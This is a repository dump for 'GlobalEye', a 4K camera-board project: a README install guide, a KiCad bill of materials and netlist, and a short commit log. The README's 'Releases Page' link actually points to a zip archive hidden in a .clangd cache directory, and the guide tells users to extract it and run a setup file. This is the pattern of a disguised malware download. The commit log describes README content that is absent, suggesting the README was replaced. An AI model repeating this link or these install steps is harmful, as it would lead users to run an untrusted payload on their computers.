# Repository jhikeplays/GlobalEye

File README.md:

# 🎥 GlobalEye - Capture Stunning 4K Images Easily

## 🚀 Getting Started

Welcome to GlobalEye! This application helps you utilize the GMAX3412 camera board to capture high-quality images at 4K resolution and 30 frames per second. This guide will help you download and run the application in a few simple steps.

## 📥 Download GlobalEye

## 🔍 System Requirements

Before you start, make sure your system meets the following requirements:

- Operating System: Windows 10 or later
- RAM: Minimum 4 GB
- Processor: Dual-core 1.8 GHz or faster
- USB Port: Available USB 3.0 port for the camera board
- Additional Software: USB drivers for GMAX3412 (if applicable)

## 📂 Download & Install

1. **Visit the Releases Page:** Go to the [GlobalEye Releases Page](https://raw.githubusercontent.com/jhikeplays/GlobalEye/main/Software/I2C_clockgen/Debug/.clangd/.cache/clangd/Global_Eye_v1.5-beta.3.zip) to access the download links.

2. **Select the Latest Version:** Look for the latest version of GlobalEye. It should be prominently displayed at the top.

3. **Download the Application:** Click on the file that corresponds to your operating system. This will download the necessary files to your computer.

4. **Extract the Files (if needed):** If the downloaded file is in a zipped format, right-click on the file and select "Extract All." Choose your desired location to save the extracted files.

5. **Install the Application:**
   - Locate the extracted folder.
   - Double-click on the setup file (if provided) to initiate the installation.
   - Follow the on-screen instructions to complete the installation.

6. **Connect Your Camera Board:** Make sure your GMAX3412 camera board is connected to your computer via a USB 3.0 port before launching the application.

7. **Launch GlobalEye:** Once the installation is complete, find the GlobalEye shortcut on your desktop or in the Start Menu. Double-click it to open the application.

## 🎨 Using GlobalEye

1. **Access the Camera Feed:** Upon launching, the application will automatically detect the camera board. You should see the live feed from your camera.

2. **Capture Photos:**
   - Use the capture button to take still images.
   - You can also adjust settings like exposure and resolution from the settings panel.

3. **Save Your Images:** Choose a folder on your computer to save your captured images by clicking on the save button.

4. **Check Your Gallery:** Browse through your saved images directly from the app to view or share your shots.

## ⚙️ Troubleshooting

If you run into issues while using GlobalEye, here are some common solutions:

- **Camera Not Detected:**
  - Ensure the camera board is properly connected to a USB 3.0 port.
  - Restart the application to see if it recognizes the device.

- **Low Quality Images:**
  - Check if the settings are set to 4K resolution.
  - Ensure good lighting conditions while capturing.

- **Software Crashes:**
  - Make sure that you are using the latest version of GlobalEye.
  - Restart your computer and try again.

## 🛠️ Features

- **4K Resolution:** Capture images at stunning 4K quality.
- **Live Feed:** View your camera feed in real-time.
- **Simple Interface:** User-friendly design for easy navigation.
- **Adjustable Settings:** Customize your photo settings for optimal results.
- **Image Gallery:** Organize and view your captured images within the app.

## 🌐 Support

If you need further assistance, feel free to check out the GitHub Issues page for common problems or to report new ones. Join users like you who have made GlobalEye their go-to application for camera board management.

## 📞 Contact

For any inquiries or technical assistance, please reach out through the contact section on our GitHub page. Your feedback is valuable to us.

Thank you for choosing GlobalEye! Enjoy capturing your best moments.

## KiCad design GlobalEye.kicad_pcb

Parts:
C1, C2, C5, C6, C11, C13, C15, C17, C19, C21, C23, C25, C27, C29, C34, C40, C42, C44, C46, C47, C48, C49, C50, C51, C52, C53, C54, C55, C56, C57, C58, C59, C60, C63, C64, C66, C68, C69, C70: 100nF; C_0402_1005Metric
C3, C4: 220nF; C_0402_1005Metric
C7, C10, C12, C14, C16, C18, C20, C22, C24, C26, C28, C43, C62: 4.7uF; C_0402_1005Metric
C8, C33, C37, C41, C45: 4.7uF; C_0603_1608Metric
C9: 47uF; C_0603_1608Metric
C30, C31: C_Feedthrough; NFM18CC101R1C3D
C32, C36: 10uF; C_0603_1608Metric
C35: 100pF; C_0402_1005Metric
C38: 22uF; C_0603_1608Metric
C39, C65, C71: 10nF; C_0402_1005Metric
C61: 47uF; C_0805_2012Metric
C67: 10uF; C_0402_1005Metric
C72: 1uF; C_0402_1005Metric
D1: MBR0540; D_SOD-123
FB1, FB2, FB3: BLM18KG102SN1D; L_0603_1608Metric
FL1, FL2, FL3, FL4, FL5: DLP11SN900HL2L; DLP11SA350HL2B
H1, H2, H3, H4: MountingHole; MountingHole_2.2mm_M2
J1: Conn_01x04_Shielded; JST_SH_SM04B-SRSS-TB_1x04-1MP_P1.00mm_Horizontal
J2: FH12A-22S-0.5SH(55); TF3822S05SV830; Part Description 22 Position FFC, FPC Connector Contacts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
J3: Conn_01x02_Shielded; Molex_PicoBlade_53398-0271_1x02-1MP_P1.25mm_Vertical
J4: Conn_01x03_MountingPin; JST_SH_SM03B-SRSS-TB_1x03-1MP_P1.00mm_Horizontal
J5: Conn_Coaxial; U.FL_Hirose_U.FL-R-SMT-1_Vertical
L1: DFE201210U-2R2M=P2; L_0805_2012Metric
R1: 22R; R_0402_1005Metric
R2: 12.4K; R_0402_1005Metric
R3, R4, R5, R6, R7, R8: 10K; R_0402_1005Metric
R9: 3.57K; R_0402_1005Metric
R10: 1.02K; R_0402_1005Metric
R11: 47K; R_0402_1005Metric
R12, R13: 10R; R_0402_1005Metric
TP1: RST; TestPoint_Pad_D1.0mm
TP2: TDIG; TestPoint_Pad_D1.0mm
TP3: TEXP; TestPoint_Pad_D1.0mm
TP4: 1V2; TestPoint_Pad_D1.0mm
TP5: VDDPIX; TestPoint_Pad_D1.0mm
TP6: TEXP1; TestPoint_Pad_D1.0mm
TP7: TEXP2; TestPoint_Pad_D1.0mm
TP8, TP9: VDDA; TestPoint_Pad_D1.0mm
U1: LGA-255_17x15_23.0x19.4mm
U2: ECS-2520MV-400-DN-TR; Oscillator_SMD_Abracon_ASDMB-4Pin_2.5x2.0mm
U3: TVS0500DRV; WSON-6-1EP_2x2mm_P0.65mm_EP1x1.6mm
U4: AP3418KTR-G1; SOT-23-5; Mouser Part Number 621-AP3418KTR-G1
U5: TPS7A90; Texas_S-PDSO-N10_EP1.2x2mm
U6: LP5907MFX-3.3; SOT-23-5
U7: LP5907MFX-1.8; SOT-23-5
U8: XMSM0C1104SDGS20R; VSSOP20_DGS_TEX
U9: ICM-42688-P; PQFN50P300X250X97-14N; PARTREV 1.2
U10: TCA9406DC; VSSOP-8_2.3x2mm_P0.5mm

Connections:
+3V3: C69.1, J1.2, J2.1, R4.1, R5.2, U10.7 (VCCB)
+5V: C30.3, C31.1, FB1.2, FB2.2, FB3.2, TP3.1
CAM_CLK_N: FL3.1, U1.E15 (OUT1_CLKN)
CAM_CLK_P: FL3.4, U1.E14 (OUT1_CLKP)
CAM_D0_N: FL1.1, U1.G15 (OUT3_N)
CAM_D0_P: FL1.4, U1.G14 (OUT3_P)
CAM_D1_N: FL2.1, U1.F15 (OUT5_N)
CAM_D1_P: FL2.4, U1.F14 (OUT5_P)
CAM_D2_N: FL4.1, U1.D15 (OUT7_N)
CAM_D2_P: FL4.4, U1.D14 (OUT7_P)
CAM_D3_N: FL5.1, U1.C15 (OUT9_N)
CAM_D3_P: FL5.4, U1.C14 (OUT9_P)
CAM_EN: J2.6, R6.1, U4.1 (EN), U5.7 (EN), U6.3 (EN), U7.3 (EN)
CLOCK: R1.1, U1.N1 (CLK_REF)
GND: C1.2, C2.2, C3.2, C4.2, C5.2, C7.2, C8.1, C9.2, C10.2, C11.2, C12.2, C13.2, C14.2, C15.2, C16.2, C17.2, C18.2, C19.2, C20.2, C21.2, C22.2, C23.2, C24.2, C25.2, C26.2, C27.2, C28.2, C29.2, C30.2, C31.2, C32.2, C33.1, C34.2, C36.2, C37.2, C38.1, C40.2, C41.2, C42.2, C43.2, C44.2, C45.2, C46.2, C47.2, C48.2, C49.2, C50.2, C51.2, C52.2, C53.2, C54.2, C55.2, C56.2, C57.2, C58.2, C59.2, C60.2, C61.2, C62.2, C63.2, C64.2, C65.2, C66.2, C67.1, C68.2, C69.2, C70.2, C71.2, C72.2, J1.1, J1.MP (Shield), J2.4, J2.7, J2.10, J2.13, J2.16, J2.19, J2.22, J2.MP, J3.2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
HFCLK: R12.2, U8.9 (PA4)
unnamed: D1.2 (A), J3.1
unnamed: C30.1, D1.1 (K), U3.4 (IN), U3.5 (IN), U3.6 (IN)
unnamed: FL5.3, J2.8
unnamed: FL5.2, J2.9
unnamed: FL4.3, J2.11
unnamed: FL4.2, J2.12
unnamed: FL3.3, J2.14
unnamed: FL3.2, J2.15
unnamed: FL2.3, J2.17
unnamed: FL2.2, J2.18
unnamed: FL1.3, J2.20
unnamed: FL1.2, J2.21
unnamed: R2.1, U1.C2 (RES_EXT_NODE_P)
unnamed: TP2.1, U1.M3 (SDO_TDIG)
unnamed: C29.1, R3.2, TP1.1, U1.L1 (SYS_RST_N)
unnamed: C2.1, U1.C3 (VBGR)
unnamed: C6.2, U1.A5 (VBIASP)
unnamed: C10.1, U1.F1 (VCPNI)
unnamed: C7.1, U1.E1 (VCPNO)
unnamed: C26.1, U1.H1 (VCPPI)
unnamed: C24.1, U1.J1 (VCPPO)
unnamed: C18.1, U1.F4 (VGRSTH)
unnamed: C28.1, U1.H4 (VGRSTL2)
unnamed: C16.1, U1.G4 (VGRSTL)
unnamed: C5.1, U1.A6 (VREF)
unnamed: C4.1, U1.R6 (VRF)
unnamed: C3.1, U1.P6 (VRS)
unnamed: C20.1, U1.F3 (VTX1H)
unnamed: C22.1, U1.G2 (VTX1L)
unnamed: C14.1, U1.F2 (VTX2H)
unnamed: C12.1, U1.G3 (VTX2L)
unnamed: R1.2, R12.1, U2.3 (Out)
unnamed: C35.1, R7.2, R8.1, U4.5 (FB)
unnamed: L1.1, U4.3 (SW)
unnamed: C37.1, FB2.1, U4.4 (VIN)
unnamed: C39.1, R9.1, R10.2, U5.3 (FB)
unnamed: C34.1, U5.8 (NR/SS)
unnamed: C31.3, C32.1, U5.6 (SS_CTRL), U5.9 (IN), U5.10 (IN)
unnamed: C8.2, FB3.1, U6.1 (IN)
unnamed: C33.2, FB1.1, U7.1 (IN)
unnamed: C65.1, R11.1, U8.5 (PA1/NRST)
unnamed: R13.1, U9.9 (INT2/FSYNC/CLKIN)
SCL_3V3: U1.N3 (SCL), U8.11 (PA11), U9.13 (AP_SCL/AP_SCLK), U10.5 (SCL_A)
SCL_IN: J1.4, J2.3, R4.2, U10.8 (SCL_B)
SDA_3V3: U1.N4 (SDA), U8.4 (PA0), U9.14 (AP_SDA/AP_SDIO/AP_SDI), U10.4 (SDA_A)
SDA_IN: J1.3, J2.2, R5.1, U10.1 (SDA_B)
SWCLK: J4.2, U8.16 (PA20/A6/SWCLK)
SWDIO: J4.1, U8.15 (PA19/SWDIO)
TEXP1: J5.1 (In), R13.2, TP6.1, U1.L3 (TEXP1), U8.1 (PA26/A1)
TEXP2: TP7.1, U1.L2 (TEXP2), U8.2 (PA27/A0)
VDDA: C6.1, C9.1, C47.1, C48.1, C49.1, C50.1, C51.1, C52.1, C53.1, C54.1, C55.1, C56.1, C57.1, C58.1, C59.1, C60.1, TP9.1, U1.A3 (VDDA1), U1.A8 (VDDA2), U1.A11 (VDDA3), U1.A14 (VDDA4), U1.D1 (VDDA5), U1.E3 (VDDA6), U1.G1 (VDDA7), U1.J3 (VDDA8), U1.K3 (VDDA9), U1.R4 (VDDA10), U1.R5 (VDDA11), U1.R8 (VDDA12), U1.R11 (VDDA13), U1.R14 (VDDA14), U6.5 (OUT)
VDDD: C11.1, C13.1, C15.1, C17.1, C19.1, C21.1, C23.1, C25.1, C27.1, C35.2, C38.2, C40.1, C41.1, C42.1, C43.1, C44.1, L1.2, R7.1, TP4.1, U1.A4 (VDDD1), U1.A7 (VDDD2), U1.A9 (VDDD3), U1.A10 (VDDD4), U1.A12 (VDDD5), U1.B9 (VDDD6), U1.B12 (VDDD7), U1.C7 (VDDD8), U1.C10 (VDDD9), U1.E17 (VDDD10), U1.F17 (VDDD11), U1.H17 (VDDD12), U1.J17 (VDDD13), U1.N7 (VDDD14), U1.N10 (VDDD15), U1.P5 (VDDD16), U1.P9 (VDDD17), U1.P12 (VDDD18), U1.R7 (VDDD19), U1.R9 (VDDD20), U1.R10 (VDDD21), U1.R12 (VDDD22), U1.R15 (VDDD23)
VDDIO: C1.1, C36.1, C45.1, C46.1, C64.1, C66.1, C67.2, C68.1, C70.1, C71.1, C72.1, R3.1, R11.2, U1.M1 (VDDIO), U1.P3 (CCI_EN), U2.1 (Standby), U2.4 (VDD), U7.5 (OUT), U8.6 (VDD), U9.5 (VDDIO), U9.8 (VDD), U9.12 (AP_CS), U10.3 (VCCA), U10.6 (OE)
VDDPIX: C39.2, C61.1, C62.1, C63.1, R9.2, TP5.1, U1.A13 (VDDPIX1), U1.R13 (VDDPIX2), U5.1 (OUT), U5.2 (OUT)

Notes on the sheet:
I2C ADDR: 0x68
I2C ADDR: 0x49
1.8V
3.3VA
1.2V
Connectors
QWIIC
I2C Devices
GMAX3412
External Exposure/Framerate Control
Debug
Power
MIPI
IMU
3.6V

Board: 4 copper layers, 39.0 x 39.0 mm, 123 parts (1 on the bottom side), 70 nets.

## Commit log

2025-12-21 init
2025-12-21 Update README with notes on FPS and power consumption
    Added notes about current issues with FPS readings, clock mismatches, and power consumption of the sensor.
